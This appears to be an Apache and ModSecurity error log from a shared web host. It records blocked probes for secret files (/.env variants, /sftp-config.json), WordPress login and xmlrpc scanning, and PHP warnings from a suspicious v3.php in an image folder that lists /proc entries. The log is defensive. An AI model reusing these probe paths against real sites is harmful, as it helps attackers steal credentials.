[Mon May 11 18:54:42.059937 2026] [security2:error] [pid 1424905:tid 1424915] [client 5.255.123.95:34666] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/.env.example"] [unique_id "agIJ0oW8yzYoWG_eyCXI6gAAAUc"]
[Mon May 11 18:54:42.060368 2026] [security2:error] [pid 1416109:tid 1416152] [client 5.255.123.95:34656] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/403.shtml"] [unique_id "agIJ0lV4kyjgo4bQBUiIrgAAANY"]
[Mon May 11 18:54:42.061288 2026] [security2:error] [pid 1424905:tid 1424915] [client 5.255.123.95:34666] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/403.shtml"] [unique_id "agIJ0oW8yzYoWG_eyCXI6gAAAUc"]
[Mon May 11 18:54:42.063953 2026] [security2:error] [pid 1412074:tid 1412081] [client 5.255.123.95:34582] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/403.shtml"] [unique_id "agIJ0jJnyuKVXoStDhbruAAAAEU"]
[Mon May 11 18:55:02.726323 2026] [autoindex:error] [pid 1416109:tid 1416144] [client 205.210.31.251:61268] AH01276: Cannot serve directory /home/totalcloud/public_html/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Mon May 11 18:55:10.997338 2026] [:error] [pid 1501831:tid 1501841] [client 45.148.126.188:36597] File does not exist: /home/pweilcom/public_html/xmlrpc.php
[Mon May 11 18:55:11.931287 2026] [:error] [pid 1502013:tid 1502042] [client 45.148.126.188:9031] File does not exist: /home/pweilcom/public_html/wp-login.php, referer: https://www.google.com
[Mon May 11 18:55:12.803839 2026] [:error] [pid 1412074:tid 1412077] [client 45.148.126.188:38375] File does not exist: /home/pweilcom/public_html/wp-login.php, referer: https://www.google.com
[Mon May 11 18:55:13.638962 2026] [:error] [pid 1412074:tid 1412088] [client 45.148.126.188:39507] File does not exist: /home/pweilcom/public_html/wp-admin.php, referer: https://www.google.com
[Mon May 11 18:55:16.153469 2026] [:error] [pid 1502013:tid 1502049] [client 45.148.126.188:60003] File does not exist: /home/pweilcom/public_html/xmlrpc.php
[Mon May 11 18:55:17.070250 2026] [:error] [pid 1501883:tid 1501895] [client 45.148.126.188:62525] File does not exist: /home/pweilcom/public_html/wp-login.php, referer: https://www.google.com
[Mon May 11 18:55:17.900756 2026] [:error] [pid 1412074:tid 1412097] [client 45.148.126.188:13395] File does not exist: /home/pweilcom/public_html/wp-login.php, referer: https://www.google.com
[Mon May 11 18:55:18.746195 2026] [:error] [pid 1501831:tid 1501842] [client 45.148.126.188:30237] File does not exist: /home/pweilcom/public_html/wp-admin.php, referer: https://www.google.com
PHP Warning:  filesize(): stat failed for /proc/20/task/20/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/20/task/20/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/20/task/20/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/20/task/20/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/20/task/20/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/20/task/20/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/657/task/657/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/657/task/657/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/657/task/657/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/657/task/657/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/657/task/657/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/657/task/657/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Mon May 11 18:56:00.575683 2026] [security2:error] [pid 1412074:tid 1412088] [client 108.136.162.67:50228] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "missmandarine.com"] [uri "/.env"] [unique_id "agIKIDJnyuKVXoStDhbsIgAAAEw"]
[Mon May 11 18:56:00.575912 2026] [security2:error] [pid 1412074:tid 1412088] [client 108.136.162.67:50228] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "missmandarine.com"] [uri "/.env"] [unique_id "agIKIDJnyuKVXoStDhbsIgAAAEw"]
[Mon May 11 18:56:00.635571 2026] [security2:error] [pid 1412074:tid 1412088] [client 108.136.162.67:50228] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agIKIDJnyuKVXoStDhbsIgAAAEw"]
[Mon May 11 18:56:00.815124 2026] [security2:error] [pid 1412074:tid 1412088] [client 108.136.162.67:50228] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.txt"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "missmandarine.com"] [uri "/.env.txt"] [unique_id "agIKIDJnyuKVXoStDhbsIwAAAEw"]
[Mon May 11 18:56:00.815389 2026] [security2:error] [pid 1412074:tid 1412088] [client 108.136.162.67:50228] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "missmandarine.com"] [uri "/.env.txt"] [unique_id "agIKIDJnyuKVXoStDhbsIwAAAEw"]
[Mon May 11 18:56:00.873886 2026] [security2:error] [pid 1412074:tid 1412088] [client 108.136.162.67:50228] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agIKIDJnyuKVXoStDhbsIwAAAEw"]
[Mon May 11 18:56:01.049924 2026] [security2:error] [pid 1412074:tid 1412088] [client 108.136.162.67:50228] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "missmandarine.com"] [uri "/laravel/.env"] [unique_id "agIKITJnyuKVXoStDhbsJAAAAEw"]
[Mon May 11 18:56:01.050138 2026] [security2:error] [pid 1412074:tid 1412088] [client 108.136.162.67:50228] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "missmandarine.com"] [uri "/laravel/.env"] [unique_id "agIKITJnyuKVXoStDhbsJAAAAEw"]
[Mon May 11 18:56:01.105854 2026] [security2:error] [pid 1412074:tid 1412088] [client 108.136.162.67:50228] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agIKITJnyuKVXoStDhbsJAAAAEw"]
[Mon May 11 18:56:01.283750 2026] [security2:error] [pid 1412074:tid 1412088] [client 108.136.162.67:50228] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "missmandarine.com"] [uri "/api/.env"] [unique_id "agIKITJnyuKVXoStDhbsJgAAAEw"]
[Mon May 11 18:56:01.283970 2026] [security2:error] [pid 1412074:tid 1412088] [client 108.136.162.67:50228] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "missmandarine.com"] [uri "/api/.env"] [unique_id "agIKITJnyuKVXoStDhbsJgAAAEw"]
[Mon May 11 18:56:01.338529 2026] [security2:error] [pid 1412074:tid 1412088] [client 108.136.162.67:50228] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agIKITJnyuKVXoStDhbsJgAAAEw"]
[Mon May 11 18:56:01.516065 2026] [security2:error] [pid 1412074:tid 1412088] [client 108.136.162.67:50228] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "missmandarine.com"] [uri "/backend/.env"] [unique_id "agIKITJnyuKVXoStDhbsJwAAAEw"]
[Mon May 11 18:56:01.516303 2026] [security2:error] [pid 1412074:tid 1412088] [client 108.136.162.67:50228] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "missmandarine.com"] [uri "/backend/.env"] [unique_id "agIKITJnyuKVXoStDhbsJwAAAEw"]
[Mon May 11 18:56:01.570499 2026] [security2:error] [pid 1412074:tid 1412088] [client 108.136.162.67:50228] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agIKITJnyuKVXoStDhbsJwAAAEw"]
[Mon May 11 18:56:01.746474 2026] [security2:error] [pid 1412074:tid 1412088] [client 108.136.162.67:50228] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "missmandarine.com"] [uri "/public/.env"] [unique_id "agIKITJnyuKVXoStDhbsKAAAAEw"]
[Mon May 11 18:56:01.746659 2026] [security2:error] [pid 1412074:tid 1412088] [client 108.136.162.67:50228] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "missmandarine.com"] [uri "/public/.env"] [unique_id "agIKITJnyuKVXoStDhbsKAAAAEw"]
[Mon May 11 18:56:01.802005 2026] [security2:error] [pid 1412074:tid 1412088] [client 108.136.162.67:50228] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agIKITJnyuKVXoStDhbsKAAAAEw"]
[Mon May 11 18:56:01.979190 2026] [security2:error] [pid 1412074:tid 1412088] [client 108.136.162.67:50228] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /server/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "missmandarine.com"] [uri "/server/.env"] [unique_id "agIKITJnyuKVXoStDhbsKgAAAEw"]
[Mon May 11 18:56:01.979402 2026] [security2:error] [pid 1412074:tid 1412088] [client 108.136.162.67:50228] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "missmandarine.com"] [uri "/server/.env"] [unique_id "agIKITJnyuKVXoStDhbsKgAAAEw"]
[Mon May 11 18:56:02.040579 2026] [security2:error] [pid 1412074:tid 1412088] [client 108.136.162.67:50228] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agIKITJnyuKVXoStDhbsKgAAAEw"]
[Mon May 11 18:56:02.218263 2026] [security2:error] [pid 1412074:tid 1412088] [client 108.136.162.67:50228] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "missmandarine.com"] [uri "/core/.env"] [unique_id "agIKIjJnyuKVXoStDhbsKwAAAEw"]
[Mon May 11 18:56:02.218496 2026] [security2:error] [pid 1412074:tid 1412088] [client 108.136.162.67:50228] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "missmandarine.com"] [uri "/core/.env"] [unique_id "agIKIjJnyuKVXoStDhbsKwAAAEw"]
[Mon May 11 18:56:02.275078 2026] [security2:error] [pid 1412074:tid 1412088] [client 108.136.162.67:50228] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agIKIjJnyuKVXoStDhbsKwAAAEw"]
[Mon May 11 18:56:02.452834 2026] [security2:error] [pid 1412074:tid 1412088] [client 108.136.162.67:50228] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "missmandarine.com"] [uri "/config/.env"] [unique_id "agIKIjJnyuKVXoStDhbsLAAAAEw"]
[Mon May 11 18:56:02.453058 2026] [security2:error] [pid 1412074:tid 1412088] [client 108.136.162.67:50228] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "missmandarine.com"] [uri "/config/.env"] [unique_id "agIKIjJnyuKVXoStDhbsLAAAAEw"]
[Mon May 11 18:56:02.507830 2026] [security2:error] [pid 1412074:tid 1412088] [client 108.136.162.67:50228] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agIKIjJnyuKVXoStDhbsLAAAAEw"]
[Mon May 11 18:56:02.689018 2026] [security2:error] [pid 1412074:tid 1412088] [client 108.136.162.67:50228] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "missmandarine.com"] [uri "/app/.env"] [unique_id "agIKIjJnyuKVXoStDhbsLQAAAEw"]
[Mon May 11 18:56:02.689391 2026] [security2:error] [pid 1412074:tid 1412088] [client 108.136.162.67:50228] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "missmandarine.com"] [uri "/app/.env"] [unique_id "agIKIjJnyuKVXoStDhbsLQAAAEw"]
[Mon May 11 18:56:02.745317 2026] [security2:error] [pid 1412074:tid 1412088] [client 108.136.162.67:50228] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agIKIjJnyuKVXoStDhbsLQAAAEw"]
[Mon May 11 18:56:05.800023 2026] [security2:error] [pid 1502013:tid 1502043] [client 108.136.162.67:50933] ModSecurity: Warning. Matched phrase "/sftp-config.json" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /sftp-config.json found within REQUEST_FILENAME: /sftp-config.json"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "missmandarine.com"] [uri "/sftp-config.json"] [unique_id "agIKJZYn-x0CHsbEbP1_cwAAAJA"]
[Mon May 11 18:56:05.800265 2026] [security2:error] [pid 1502013:tid 1502043] [client 108.136.162.67:50933] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "missmandarine.com"] [uri "/sftp-config.json"] [unique_id "agIKJZYn-x0CHsbEbP1_cwAAAJA"]
